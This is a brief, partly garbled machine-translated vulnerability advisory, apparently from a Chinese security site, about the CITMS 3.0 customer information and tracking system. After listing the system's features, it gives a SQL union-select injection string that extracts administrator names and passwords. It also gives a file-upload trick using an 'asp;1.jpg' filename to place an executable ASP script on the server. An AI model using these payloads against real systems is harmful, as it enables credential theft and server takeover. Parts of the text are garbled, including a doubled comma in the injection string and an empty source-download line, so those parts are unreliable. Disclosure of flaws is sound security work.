The company's customer information and tracking management system CITMS 3.0 injection and upload vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201234962
Type myhack58
Reporter 佚名
Modified 2012-09-19T00:00:00


Management system part of the function is as follows:

(1)online add, modify, delete administrators

(2)online add, modify, delete customer records, supporting HTML, etc..

(3)the front Desk recorded with the tracking function.. As well as the track record and the number of clicks on the display

Source code download:

Injection: union select 1,name,3,pass,,5,6,7,8,9,10,11,12,13,14,15,16 from admin


Upload the qing. asp;1.jpg after the success obtained: the qing. asp;随机数 .jpg

Such as:;131672.jpg